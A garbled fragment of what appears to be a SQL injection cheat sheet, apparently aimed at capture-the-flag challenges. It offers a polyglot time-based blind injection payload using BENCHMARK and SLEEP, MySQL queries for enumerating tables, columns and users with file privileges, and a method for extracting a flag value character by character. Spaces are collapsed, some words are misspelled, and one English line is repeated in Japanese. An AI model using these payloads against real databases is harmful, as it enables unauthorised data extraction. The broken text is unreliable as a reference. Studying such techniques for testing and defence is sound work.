SELECT * FROM some_table WHERE double_quotes = "IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1))/*'XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR'|"XOR(IF(SUBSTR(@@version,1,1)<5,BENCHMARK(2000000,SHA1(0xDE7EC71F1)),SLEEP(1)))OR"*/"
SELECT table_name FROM information_schema.tables WHERE table_schema=database();#Getname of the tablesSELECT column_name FROM information_schema.columns WHERE table_name="<TABLE_NAME>"; #Get name of the columns of the table
SELECT<COLUMN1>,<COLUMN2>FROM<TABLE_NAME>; #GetvaluesSELECT user FROM mysql.user WHERE file_priv='Y'; #Users withfile privileges
# When a True is returned, you have found the number of columnsselect (select "", "") = (SELECT*fromdemolimit1); # 2columnsselect (select "", "", "") < (SELECT*fromdemolimit1); # 3columns
Supposing there is 2 columns (being the first one the ID) and the other one the flag, you can try to bruteforce the content of the flag trying character by character:
仮に2つの列があるとします(最初の列がIDで、もう1つがフラグです)。フラグの内容を1文字ずつ試してブルートフォースすることができます:
# When True, you found the correct char and can start ruteforcing the next positionselect (select 1, 'flaf') = (SELECT*fromdemolimit1);
